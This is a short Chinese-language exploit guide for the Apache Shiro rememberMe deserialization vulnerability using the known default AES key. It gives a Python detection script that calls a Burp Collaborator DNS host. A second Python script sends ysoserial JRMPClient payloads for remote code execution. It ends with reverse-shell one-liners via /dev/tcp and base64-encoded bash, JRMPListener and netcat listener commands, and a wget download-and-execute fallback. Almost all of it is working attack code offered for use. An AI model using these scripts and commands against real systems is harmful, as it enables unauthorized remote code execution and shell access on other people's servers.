利用burp dns進行檢測,腳本如下:
import sys
import uuid
import base64
import subprocess
from Crypto.Cipher import AES
import requests
# copy to clipboard
def encode_rememberme(command):
popen = subprocess.Popen(['java', '-jar', 'ysoserial.jar', 'URLDNS', command], stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")
iv = uuid.uuid4().bytes
encryptor = AES.new(key, AES.MODE_CBC, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
if __name__ == '__main__':
payload = encode_rememberme('http://xxx.burpcollaborator.net')
print "rememberMe={0}".format(payload.decode())
target = 'http://xxx.com'
r = requests.get(target,cookies={'rememberMe': payload.decode()},timeout=10)
print r.text
漏洞利用腳本如下:
import os
import re
import base64
import uuid
import subprocess
import requests
import sys
from Crypto.Cipher import AES
def poc(url,rce_command):
if '://' not in url:
target = 'https://%s' % url if ':443' in url else 'http://%s' % url
else:
target = url
payload = generator(rce_command)
#
try:
#print "rememberMe={0}".format(payload.decode())
r = requests.get(target,cookies={'rememberMe': payload.decode()},timeout=10)
print r.text
except Exception, e:
pass
# # return False
def generator(command):
popen = subprocess.Popen(['java', '-jar', 'ysoserial.jar', 'JRMPClient', command], stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "kPH+bIxk5D2deZiIxcaaaA=="
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
#print(base64_ciphertext)
return base64_ciphertext
if __name__ == '__main__':
url = 'http://x.x.x.x:8071'
cmd = 'x.x.x.x:443'
poc(url,cmd)
在你的vps上使用如下payload進行反彈即可
linux反彈命令 bash -i >& /dev/tcp/xxxxxx.x/53 0>&1 base64編碼 bash -c {echo,xxxxxxx}|{base64,-d}|{bash,-i} vps上執行,CommonsCollections也可以使用CommonsCollections2,CommonsCollections4 java -cp ysoserial.jar ysoserial.exploit.JRMPListener 443 CommonsCollections1 'bash -c {echo,xxxxxxx}|{base64,-d}|{bash,-i}' 監聽反彈端口 nc -lvp 53
有時候直接反彈是不成功的。可以先下載然后執行。
/bin/bash -i >& /dev/tcp/*.*.*.*/2019 0>&1 將反彈shell的命令寫成txt然后放在web目錄下 開啟web python -m SimpleHTTPServer 8080 執行下載命令 java -cp ysoserial-master-SNAPSHOT.jar ysoserial.exploit.JRMPListener 2020 CommonsCollections1 'wget http://*.*.*.*:8080/1.txt' 執行反彈命令 java -cp ysoserial-master-SNAPSHOT.jar ysoserial.exploit.JRMPListener 2020 CommonsCollections1 'sh 1.txt' 監聽反彈端口 nc -lvv 2019